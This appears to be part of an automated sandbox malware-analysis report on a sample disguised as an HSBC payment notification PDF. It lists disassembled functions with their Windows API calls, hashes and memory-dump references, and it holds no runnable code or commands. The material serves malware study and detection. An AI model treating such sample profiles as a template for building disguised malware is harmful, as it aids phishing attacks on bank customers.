                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                                    • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                                                                                                    • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                                                                                                                                    • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                                                                                                    • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                                                                                                                                    Function 004563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                                                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0045645C
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00456466
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2108273632-0
                                                                                                                                                    • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                                                                                                    • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                                                                                                                                    • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                                                                                                    • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                                                                                                                                    Function 00458A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00458A30
                                                                                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                                                                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                                    • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                                                                                                    • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                                                                                                                                    • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                                                                                                    • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                                                                                                                                    Function 0045B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0045B204
                                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0045B289
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3902887630-0
                                                                                                                                                    • Opcode ID: 010481258782a9ac0136f1ce20d41722eaecc78a47f1c1a55077ec376a10d582
                                                                                                                                                    • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                                                                                                                                    • Opcode Fuzzy Hash: 010481258782a9ac0136f1ce20d41722eaecc78a47f1c1a55077ec376a10d582
                                                                                                                                                    • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                                                                                                                                    Function 0048B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2294984445-0
                                                                                                                                                    • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                                                                                                    • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                                                                                                                                    • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                                                                                                    • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                                                                                                                                                    Function 00459307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                                                                                                                                                    • __itow.LIBCMT ref: 0045936A
                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                                                                                                                                                    • __itow.LIBCMT ref: 004593A3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$__itow$_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2983881199-0
                                                                                                                                                    • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                                                                                                    • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                                                                                                                                                    • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                                                                                                    • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                                                                                                                                                    Function 004012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0040135C
                                                                                                                                                    • BeginPath.GDI32(?), ref: 00401373
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0040139C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3225163088-0
                                                                                                                                                    • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                                                                                                    • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                                                                                                                                                    • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                                                                                                    • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                                                                                                                                                    Function 00464A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                                                                                                                                    • __beginthreadex.LIBCMT ref: 00464AD8
                                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3824534824-0
                                                                                                                                                    • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                                                                                    • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                                                                                                                                    • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                                                                                    • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                                                                                                                                    Function 00458202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                                                                                                                                    • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 842720411-0
                                                                                                                                                    • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                                                                                    • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                                                                                                                                    • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                                                                                    • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                                                                                                                                    Function 0045710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                                    • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                                                                                    • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                                                                                                                                    • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                                                                                                                    • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                                                                                                                                    Function 00465244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                                                                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                                    • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                                                                                    • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                                                                                                                                    • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                                                                                                                    • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                                                                                                                                    Function 0045810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                    • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                                                                                                    • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                                                                                                                                                    • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                                                                                                                    • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                                                                                                                                                    Function 0045C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
